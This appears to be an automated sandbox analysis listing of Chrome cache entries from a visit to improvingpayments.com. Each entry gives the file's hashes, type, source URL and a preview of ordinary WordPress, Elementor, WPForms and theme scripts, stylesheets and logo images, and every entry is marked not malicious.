Preview:	.elementor-263 .elementor-element.elementor-element-577e7ff:not(.elementor-motion-effects-element-type-background), .elementor-263 .elementor-element.elementor-element-577e7ff > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-color:#26262c;}.elementor-263 .elementor-element.elementor-element-577e7ff{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;padding:104px 40px 104px 40px;}.elementor-263 .elementor-element.elementor-element-577e7ff > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-263 .elementor-element.elementor-element-7ba7377 > .elementor-element-populated{padding:0px 96px 0px 0px;}.elementor-263 .elementor-element.elementor-element-1d8c621 .elementor-heading-title{color:#ffffff;}.elementor-263 .elementor-element.elementor-element-dd4d327{color:#ffffff;font-weight:600;}.elementor-263 .elementor-element.elementor-element-dd4d327 > .elementor-widget-container{margin

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1320)
Category:	downloaded
Size (bytes):	1360
Entropy (8bit):	5.125806283028512
Encrypted:	false
SSDEEP:
MD5:	CB0E5952FBE533069CDA30292E2EF353
SHA1:	F46E169AD03BAC202A3109A692DA9F1F6C27AB99
SHA-256:	B1EFC1D040CD39F97B10A044357DB6D17A2150EFE99C3A1ADED204C09B88C7A9
SHA-512:	455951932CFE04F6719855CF8EFDE17CDDE194FE8C64C1725007513057D72AE70881BEAFEE05ACAAC4EF5B89F052254CD2FE544DF547EFB30F9E4C9FBCCC3D94
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js
Preview:	/! elementor - v3.11.1 - 15-02-2023 /."use strict";(self.webpackChunkelementor=self.webpackChunkelementor\|\|[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{paragraph:"p:first"},classes:{dropCap:"elementor-drop-cap",dropCapLetter:"elementor-drop-cap-letter"}}}getDefaultElements(){const e=this.getSettings("selectors"),t=this.getSettings("classes"),r=jQuery("<span>",{class:t.dropCap}),p=jQuery("<span>",{class:t.dropCapLetter});return r.append(p),{$paragraph:this.$element.find(e.paragraph),$dropCap:r,$dropCapLetter:p}}wrapDropCap(){if(!this.getElementSettings("drop_cap"))return void(this.dropCapLetter&&(this.elements.$dropCap.remove(),this.elements.$paragraph.prepend(this.dropCapLetter),this.dropCapLetter=""));const e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/ /g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (339), with no line terminators
Category:	downloaded
Size (bytes):	339
Entropy (8bit):	4.872617629737575
Encrypted:	false
SSDEEP:
MD5:	F2A351D1597CC89F92A145B82B461890
SHA1:	1EBDC6F91F82C6D01332E1A5E225AD27D6EDA91E
SHA-256:	B969721EF6FCCA6918159844304AFF2970CF511E07F17837C55E989876CD7A3B
SHA-512:	68DA8FA0D45610B7A11108D00935B99E10F52EDCE6CD8408B04FE39D4E0186764E97EAC6C9D036BA7C06EE1F6B1641E64019B8EC69B1F2A389C36D7F5BFDD252
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/js/utils.min.js?ver=1.8.0.1
Preview:	"use strict";const WPFormsUtils=window.WPFormsUtils\|\|function(r){return{triggerEvent:function(n,t,e=[]){t=new r.Event(t);return n.trigger(t,e),t},debounce:function(r,i,u){var o;return function(){var n=this,t=arguments,e=u&&!o;clearTimeout(o),o=setTimeout(function(){o=null,u\|\|r.apply(n,t)},i),e&&r.apply(n,t)}}}}((document,window,jQuery));

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (59701)
Category:	downloaded
Size (bytes):	113381
Entropy (8bit):	4.921824878665509
Encrypted:	false
SSDEEP:
MD5:	51A8390B47AA0582CF2D9C96C5ADDEE2
SHA1:	B16A640874025D085C38119A1A02A3460F83F2DE
SHA-256:	98CECF88A23542FA047CE46EEDB650B5C5128761ED4386C0977B847094DDFA20
SHA-512:	711162AB43E59E0FF5F050CCA4278682194248A13EF2EE1F00AB276B6221E7A4DDDEB9645E8798E7F67A34F0001C8F63469F2B2C3E6D4E2519ADA30B6775E191
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/css/dist/block-library/style.min.css?ver=6.5.2
Preview:	@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-bl

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (24463)
Category:	downloaded
Size (bytes):	24602
Entropy (8bit):	5.240691940710685
Encrypted:	false
SSDEEP:
MD5:	7E539226482D5D4835F6DA6642245C3F
SHA1:	F367AAC9DD8C86F072E73C11C6973F53465B6161
SHA-256:	2F4CFBBC8E5EC834092F3E40158B5A1B1551FB0B8E5BB9894335BAC7B49F913A
SHA-512:	997DA6F6B264FEACF39B06FD49AEE8C3389D827E8167C56573F637D16D4F22F97A421EB470BE710614F1F200D2F453FF2F656768B2523826A87BB0BA723BC731
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/lib/jquery.validate.min.js?ver=1.19.5
Preview:	/! jQuery Validation Plugin - v1.19.5 - 7/1/2022. https://jqueryvalidation.org/. * Copyright (c) 2022 J.rn Zaefferer; Licensed MIT */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof module&&module.exports?module.exports=a(require("jquery")):a(jQuery)}(function(a){a.extend(a.fn,{validate:function(b){if(!this.length)return void(b&&b.debug&&window.console&&console.warn("Nothing selected, can't validate, returning nothing."));var c=a.data(this[0],"validator");return c?c:(this.attr("novalidate","novalidate"),c=new a.validator(b,this[0]),a.data(this[0],"validator",c),c.settings.onsubmit&&(this.on("click.validate",":submit",function(b){c.submitButton=b.currentTarget,a(this).hasClass("cancel")&&(c.cancelSubmit=!0),void 0!==a(this).attr("formnovalidate")&&(c.cancelSubmit=!0)}),this.on("submit.validate",function(b){function d(){var d,e;return c.submitButton&&(c.settings.submitHandler\|\|c.formSubmitted)&&(d=a("<input type='hidden'/>").attr("name",c.subm

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (18798)
Category:	downloaded
Size (bytes):	18833
Entropy (8bit):	5.198890693042313
Encrypted:	false
SSDEEP:
MD5:	F88D5720BB454ED5D204CBDB56901F6B
SHA1:	F1952292FDE4B15936E9AAC16B2B9896684DB95B
SHA-256:	726B820E44F6AB90AD991D30A4BF26D3A5D71493CBCD1FB1EFD0D14E89B9DF2A
SHA-512:	F7E3EC0C5B832116D75CAC2A5A40AB6FE673CC6C0996BD898F25850ED5555484D821E1FC4CA039C69DA3AB51FAA25613D622DB1177D7CDE16DA477145C3A6E22
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/js/underscore.min.js?ver=1.13.4
Preview:	/! This file is auto-generated /.!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n\|\|self,t=n._,(e=n._=r()).noConflict=function(){return n._=t,e})}(this,function(){var n="1.13.6",r="object"==typeof self&&self.self===self&&self\|\|"object"==typeof global&&global.global===global&&global\|\|Function("return this")()\|\|{},e=Array.prototype,F=Object.prototype,V="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=F.toString,q=F.hasOwnProperty,t="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=t&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 181 x 50, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	1781
Entropy (8bit):	7.71814114028459
Encrypted:	false
SSDEEP:
MD5:	750BC5C2D986534FEDD7051F035AFF59
SHA1:	140F44E909AAE264F19BC17A86216D353F975F34
SHA-256:	4392BAD1C53DF97E6DD0E7FCB04768F878545276B59F9C848D6C7F3EF1ACD38C
SHA-512:	1301DB8A1027DEAE9ECBF6778073B54F548358E6E23B9A5A647F9AF62A69DC2839DD351420AC704BF8759C5F2EF875FD40EC85809F80371B2E2713C2086E1FF5
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/2023/01/improving_payments_White.png
Preview:	.PNG........IHDR.......2.....-8j.....PLTE......i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F....i.V.F..o.....tRNS.... 000@@@PPP```ppp...............................IDATx..{W.8....bf.].....@.ZL...ns1..2..=....is}........[...8+fO..p..sb...9....g..e0.x..q.\......n..DJ!s...8.f.z.<k.o...'........t..~....&..[S.Z....X...i..us..dM....Z..wY.R..Vhr^..k_~h...n.2X(+M.E."..#...~.A.F...ov..&k......v....Z..N..T.-.)....J....lMw....G....2x&....s..Ij-..M!2!{.V.....B..]!Dn.....$..S9c!.2?......\...L.-.jY.fy..1.a.X,.x...?Z.Xr....L'....P{)..2sQ.......R........j......k.R_.p..<.X#X.^.....eT.p...KuZw...Rk4............}..,F...:d..gM.(..H. ..[...L.Hz...M1.~.y6#.J...j ...:......Z...0........H..4.....4;..j ^....ek9f..H..(.!b.f`..+..i6......\.c.......1Wa.I.<..w.I..:...`..Jg#.a..._C...............4\|^#..q.E..Z.X.25...v..a.;X......k.-@.........1k_.......".%oQ..}0..Gf.}OLHC....).K......>......z ..i

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 293 x 80, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2787
Entropy (8bit):	7.848479161217875
Encrypted:	false
SSDEEP:
MD5:	D0BDBA05C366E7F0454F294221F0F1A5
SHA1:	66A21C5551C6461EE1F4A0AB54425EA05F3CCB61
SHA-256:	EE68E53389C1262C04081307570F147182FDE7F07D3AB50B5DC9178C1CA67FE5
SHA-512:	75051C70DDC77AC5D07934AE50755368A61B2BAA796772187EACB7617C00428563CF9213E62BDBB1AE4275FEE27F2FA9B65BE8EFCDFFB31E042324E17C9287AB
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...%...P.....h!......PLTE...cdfcdfcdfcdfcdfcdfcdfi.V.F..F..F..F..F..F..F..F..F..F..F..F..F..F..F..F.i.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vi.Vcdfcdfcdfcdfcdfcdfcdfcdfcdfq.G....1tRNS..0.` .p..@0....... `pP..Pp.... @..0...`..P.....@.#......IDATx....v. ......`gh......M.x.....+c%.....@B._....0.L.......}.5/.su.5.xO.9.....k..ly..:?.{.....n..b.-.&'....`,.c7..<P.....-..._...6..0n.L.LIF.:.s.<....0....I...{...pN..?.q..oyy..2.y?G!0..f....\|.Z...f......./...V.RF.g.............%$K.,6..D.+...&d.J..I..J8..e..jz.D.......1Z.B..e.]7.:SQm$0"./j.&K....z...+%$.Q.I...8....,..J.^]5..ZVDW.r.....m...1.F.6+HI2W3&.B.....Pl.4.`...`......V............+K...vR...._._G.ND.1....a...H...F..".T...-.Z0..TId...GTM4....-...q...+..X.el).{...3..U)...p.I.w).i.&.d..`.x.....0n..jJ%.=...L.dP..^......tpo....X........l"VGw?.@....j......ZL....+I@n..V..5.....<...P.TXI....s.k..@.N...u.UW.."..9..{....!.....^>.l..p..&.A..r......f..k..L...ts..%nn...Aj.j..,."`r.....lO..$0..\|..=....i2=.

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (41843)
Category:	downloaded
Size (bytes):	41883
Entropy (8bit):	5.256114240920933
Encrypted:	false
SSDEEP:
MD5:	3AF7549A6B56C8C65BBEBDA33FE04160
SHA1:	1F9D61F1D467425720D81689E46D777785B48475
SHA-256:	A328F40F34617B5CB97D142EAA74977767856B0269B0E3EDF5B656F827B54575
SHA-512:	FC2D5B37199D8FB59D881A03D6E9E8DE4E9DB9E2509E9F2EB34AA48B01BCC077705F12CFF5C5162D6E1DA16990CF1AAF8FCA9DA4B4E182418AA24444708FE5CC
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.11.1
Preview:	/! elementor - v3.11.1 - 15-02-2023 /.(self.webpackChunkelementor=self.webpackChunkelementor\|\|[]).push([[819],{9220:(e,t,n)=>{"use strict";var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=s(n(8135));class _default extends elementorModules.ViewModule{constructor(){super(...arguments),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:i.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,s=t.elementorType,i=this.documentClasses[s]\|\|this.documentClasses.base;this.documents[

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1391)
Category:	downloaded
Size (bytes):	1426
Entropy (8bit):	5.2713128211306
Encrypted:	false
SSDEEP:
MD5:	19D386C9004E54941C1CC61D357EFA5D
SHA1:	0A77594006C8D86FDCC0ADBC2B9AECAEF3869586
SHA-256:	3BC6467A95CEC8FA516C6F5F69E1301E37E16F9BB1046FE7756729249F901B95
SHA-512:	7811CF6BABB4DF41707F97D1BD65337B5AD7AAEDFF301FCEDB90FB7773FA9876F52458AA03A576910F6126384599EF25F8DE76EE309C22E1914D9CF444AEFB6F
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/js/wp-util.min.js?ver=6.5.2
Preview:	/! This file is auto-generated /.window.wp=window.wp\|\|{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{\{([^\}]+?)\}\}(?!\})/g,variable:"data"};return function(t){if(document.getElementById("tmpl-"+e))return(n=n\|\|_.template(s("#tmpl-"+e).html(),a))(t);throw new Error("Template not found: #tmpl-"+e)}}),wp.ajax={settings:t.ajax\|\|{},post:function(t,e){return wp.ajax.send({data:_.isObject(t)?t:_.extend(e\|\|{},{action:t})})},send:function(a,t){var e,n;return _.isObject(a)?t=a:(t=t\|\|{}).data=_.extend(t.data\|\|{},{action:a}),t=_.defaults(t\|\|{},{type:"POST",url:wp.ajax.settings.url,context:this}),(e=(n=s.Deferred(function(n){t.success&&n.done(t.success),t.error&&n.fail(t.error),delete t.success,delete t.error,n.jqXHR=s.ajax(t).done(function(t){var e;"1"!==t&&1!==t\|\|(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1713), with no line terminators
Category:	downloaded
Size (bytes):	1713
Entropy (8bit):	5.452886903350374
Encrypted:	false
SSDEEP:
MD5:	23B0D9051790B4A386F66FF1836815BC
SHA1:	0DC76A6BCAD4BDCE1B88EC6E68215733C97FC520
SHA-256:	69A15BA379260F131F7DFA2A5414CBDC48DB661AC21D696773C7E67259255CA1
SHA-512:	0A042362B87D03C344926446DBDAFB436BF5CCBBAB4826A8FE27C21B3CD1D8661620C88C636400379FCF4B66A75A63CCD21E4DDF8B86CEC11EE972092641126B
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/lib/punycode.min.js?ver=1.0.0
Preview:	"use strict";var punycode=new function(){this.utf16={decode:function(r){for(var e,o,t=[],n=0,f=r.length;n<f;){if(55296==(63488&(e=r.charCodeAt(n++)))){if(o=r.charCodeAt(n++),55296!=(64512&e)\|\|56320!=(64512&o))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");e=((1023&e)<<10)+(1023&o)+65536}t.push(e)}return t},encode:function(r){for(var e,o=[],t=0,n=r.length;t<n;){if(55296==(63488&(e=r[t++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<e&&(e-=65536,o.push(String.fromCharCode(e>>>10&1023\|55296)),e=56320\|1023&e),o.push(String.fromCharCode(e))}return o.join("")}};var v=36,A=2147483647;this.decode=function(r,e){var o,t,n,f,h,a,i,c,l=[],u=[],d=r.length,s=128,g=0,C=72,p=r.lastIndexOf("-");for(p<0&&(p=0),t=0;t<p;++t){if(e&&(u[l.length]=r.charCodeAt(t)-65<26),128<=r.charCodeAt(t))throw new RangeError("Illegal input >= 0x80");l.push(r.charCodeAt(t))}for(n=0<p?p+1:0;n<d;){for(f=g,h=1,a=v;;a+=v){if(d<=n)return;if(c=r.charCodeAt(n++),v<=(c=c-48<10?c-22:c-65<26?c

Chrome Cache Entry: 126

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (15371), with no line terminators
Category:	downloaded
Size (bytes):	15371
Entropy (8bit):	4.617340142542053
Encrypted:	false
SSDEEP:
MD5:	2AC1F611B613445AE97A38B92915F2AE
SHA1:	9FD95FF7909F9C91D8F547EF4EFF344AF6413CCC
SHA-256:	6C8110358CE36D46A951C04242F4256F5E7B04D4C5FDE0469066C8EE9FB5EA4C
SHA-512:	954CDF4E65A7CC450D330C9524F1BC039FCAE320E16F31F642B3387F63F8D8D6872E3C5E7652BE9C7E105FFAC5F23503CA7A441C039A50303AF5DD4097471AEC
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/elementor/css/post-1111.css?ver=1686169416
Preview:	.elementor-1111 .elementor-element.elementor-element-78d67ee > .elementor-container{min-height:100vh;}.elementor-1111 .elementor-element.elementor-element-78d67ee:not(.elementor-motion-effects-element-type-background), .elementor-1111 .elementor-element.elementor-element-78d67ee > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-image:var(--e-bg-lazyload-loaded);--e-bg-lazyload:url("https://improving.patriotcbdguide.com/wp-content/uploads/2021/05/digital-marketing-agency-hero-img-bg.jpg");background-position:center center;background-repeat:no-repeat;background-size:cover;}.elementor-1111 .elementor-element.elementor-element-78d67ee > .elementor-background-overlay{background-color:#121240CF;background-image:var(--e-bg-lazyload-loaded);--e-bg-lazyload:url("https://improving.patriotcbdguide.com/wp-content/uploads/2021/05/digital-marketing-agency-hero-img-bg-overlay.svg");background-position:bottom right;background-repeat:no-repeat;background-size:50vw auto;

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33305), with no line terminators
Category:	downloaded
Size (bytes):	33305
Entropy (8bit):	5.211813676233741
Encrypted:	false
SSDEEP:
MD5:	3CB598A648684B27E3D265A6990444FF
SHA1:	7B2095A8CA07BD3A399C44BA3541794397FED226
SHA-256:	BEE737D0ECAD2508B9AA3D6EBA93B86EC6836453344D8B5F0090C6B13FFDB633
SHA-512:	5B1E207948556D43F4F63DCB2BF2FCF04C674AED4DA64323547C33B881016E01DAB2D3ECFA52C379AF3BB2D0CE565AAE6FE40D00692B84CD4B8F3827BA9C8496
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/js/wpforms.min.js?ver=1.8.0.1
Preview:	"use strict";var wpforms=window.wpforms\|\|function(n,s,p){var l={init:function(){p(l.ready),p(s).on("load",function(){"function"==typeof p.ready.then?p.ready.then(l.load):l.load()}),l.bindUIActions(),l.bindOptinMonster()},ready:function(){l.clearUrlQuery(),l.setUserIndentifier(),l.loadValidation(),l.loadDatePicker(),l.loadTimePicker(),l.loadInputMask(),l.loadSmartPhoneField(),l.loadPayments(),l.loadMailcheck(),l.loadChoicesJS(),p(".wpforms-randomize").each(function(){for(var e=p(this),t=e.children();t.length;)e.append(t.splice(Math.floor(Math.random()t.length),1)[0])}),p(".wpforms-page-button").prop("disabled",!1),p(n).trigger("wpformsReady")},load:function(){},clearUrlQuery:function(){var e=s.location,t=e.search;-1!==t.indexOf("wpforms_form_id=")&&(t=t.replace(/([&?]wpforms_form_id=[0-9]$\|wpforms_form_id=[0-9]&\|[?&]wpforms_form_id=[0-9](?=#))/,""),history.replaceState({},null,e.origin+e.pathname+t))},loadValidation:function(){void 0!==p.fn.validate&&(p(".wpforms-input-temp-name").e

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (771), with no line terminators
Category:	downloaded
Size (bytes):	771
Entropy (8bit):	4.987651578772006
Encrypted:	false
SSDEEP:
MD5:	2399EF783701F73C399589AE95298B0F
SHA1:	3E1F2A7AC9DCB2B50B1F1CF768441E46FD9F62EE
SHA-256:	2DEA57483641F8762937DFD9B09126A9B21C88BD3D7486186003E0BBB9043145
SHA-512:	50F1C2B16C8C2FC62C504A33529DCEF3FDBDD1533206C8779772CBBA1A336C7C5BBB533A35F99E559ADED3D1BF0C858C10A04EC083969F47A29DEAC92E366FA1
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.min.js?ver=1.8.0.1
Preview:	"use strict";var WPFormsElementorFrontend=window.WPFormsElementorFrontend\|\|function(o,e,n){var r={init:function(){r.events()},events:function(){e.addEventListener("elementor/popup/show",function(e){e=n("#elementor-popup-modal-"+e.detail.id).find(".wpforms-form");e.length&&r.initFields(e)})},initFields:function(e){wpforms.ready(),"undefined"!=typeof wpformsModernFileUpload&&wpformsModernFileUpload.init(),"undefined"!=typeof wpformsRecaptchaLoad&&("recaptcha"===wpformsElementorVars.captcha_provider&&"v3"===wpformsElementorVars.recaptcha_type?"undefined"!=typeof grecaptcha&&grecaptcha.ready(wpformsRecaptchaLoad):wpformsRecaptchaLoad()),n(o).trigger("wpforms_elementor_form_fields_initialized",[e])}};return r}(document,window,jQuery);WPFormsElementorFrontend.init();

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (38436)
Category:	downloaded
Size (bytes):	40618
Entropy (8bit):	4.979887452105827
Encrypted:	false
SSDEEP:
MD5:	DAC3BC08A99787138AF9B083E33B363F
SHA1:	943167BDA215C2CC27569C56952F577BB3240F6C
SHA-256:	61EFDDBAC8C465A7AC3B014E0BD5D26826CD2A0AD036D3CF3861EDB6CB502AC3
SHA-512:	27485C5DCCEB08496C981F1C9CA2FD0856D902C09CCCEC121850A5A4CD8EF84DEDF7FEBB0A50BDDBD5F977723AC3840FB134560298A639E15EFFDE35F490A9C7
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.0.2
Preview:	@charset "UTF-8";address,blockquote,body,dd,dl,dt,fieldset,figure,h1,h2,h3,h4,h5,h6,hr,html,iframe,legend,li,ol,p,pre,textarea,ul{border:0;font-size:100%;font-style:inherit;font-weight:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}html{-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}main,nav{display:block}progress{display:inline-block;vertical-align:baseline}a{background-color:transparent}a:active{outline:0}a,a:focus,a:hover,a:visited{text-decoration:none}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:0}hr{box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (18114), with no line terminators
Category:	downloaded
Size (bytes):	18114
Entropy (8bit):	5.1268985699598115
Encrypted:	false
SSDEEP:
MD5:	17021088D1E5BF6D919F1EEF0E7C9EDB
SHA1:	24009D663FA269F6E85368F0F0E314681CBA36E7
SHA-256:	149712C16718936D2B7AD4C16D10E89DE23C9C3B1C157158B533B961F2BF644D
SHA-512:	898218FE568542FD60B6335B5ADF440DC9DF915B80EE6F49B4CA5DD1D79B351A7D0141D05FF2F0B2CB479CB9A268C263CBF0CBB1B46257C327CF80D550651854
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.0.2
Preview:	var astraGetParents=function(e,t){Element.prototype.matches\|\|(Element.prototype.matches=Element.prototype.matchesSelector\|\|Element.prototype.mozMatchesSelector\|\|Element.prototype.msMatchesSelector\|\|Element.prototype.oMatchesSelector\|\|Element.prototype.webkitMatchesSelector\|\|function(e){for(var t=(this.document\|\|this.ownerDocument).querySelectorAll(e),a=t.length;0<=--a&&t.item(a)!==this;);return-1<a});for(var a=[];e&&e!==document;e=e.parentNode)(!t\|\|e.matches(t))&&a.push(e);return a},getParents=function(e,t){console.warn("getParents() function has been deprecated since version 2.5.0 or above of Astra Theme and will be removed in the future. Use astraGetParents() instead."),astraGetParents(e,t)},astraToggleClass=function(e,t){e.classList.contains(t)?e.classList.remove(t):e.classList.add(t)},toggleClass=function(e,t){console.warn("toggleClass() function has been deprecated since version 2.5.0 or above of Astra Theme and will be removed in the future. Use astraToggleClass() instead."),astr

Chrome Cache Entry: 132

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (1646)
Category:	downloaded
Size (bytes):	75684
Entropy (8bit):	4.794084903788304
Encrypted:	false
SSDEEP:
MD5:	2395C81E72A52F14588816B4F72A7F17
SHA1:	711357E8D49C28BE7605FCFBF881B90567DECEE1
SHA-256:	EA14D1B1233E6CBC9B1A156AC532F076F7ADAFC309726FCA7BF8833F882AC872
SHA-512:	1E39451DE9CD1A5484C1E507C085AEBCDED77467926FC52E6436DE506C5CA698CDA6EECD202B36F7BA63FA7BDE576F0CB866BAD8D4EFEBBC3C1FD5D02F2817E2
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.13
Preview:	/* Navigation Menu CSS */..ul.hfe-nav-menu,..hfe-nav-menu li,..hfe-nav-menu ul {. list-style: none !important;. margin: 0;. padding: 0;.}...hfe-nav-menu li.menu-item {. position: relative;.}...hfe-flyout-container .hfe-nav-menu li.menu-item {. position: relative;. background: unset;.}...hfe-nav-menu .sub-menu li.menu-item {. position: relative;. background: inherit;.}..hfe-nav-menu__theme-icon-yes button.sub-menu-toggle {. display: none;.}.div.hfe-nav-menu,..elementor-widget-hfe-nav-menu .elementor-widget-container {. -js-display: flex;. display: -webkit-box;. display: -webkit-flex;. display: -moz-box;. display: -ms-flexbox;. display: flex;. -webkit-box-orient: vertical;. -webkit-box-direction: normal;. -webkit-flex-direction: column;. -moz-box-orient: vertical;. -moz-box-direction: normal;. -ms-flex-direction: column;. flex-direction: column;.}...hfe-nav-menu__layout-horizontal,..hfe-nav-menu__layout-horizontal .hfe-nav

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1238)
Category:	downloaded
Size (bytes):	1239
Entropy (8bit):	5.068464054671174
Encrypted:	false
SSDEEP:
MD5:	9E8F56E8E1806253BA01A95CFC3D392C
SHA1:	A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
SHA-256:	2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
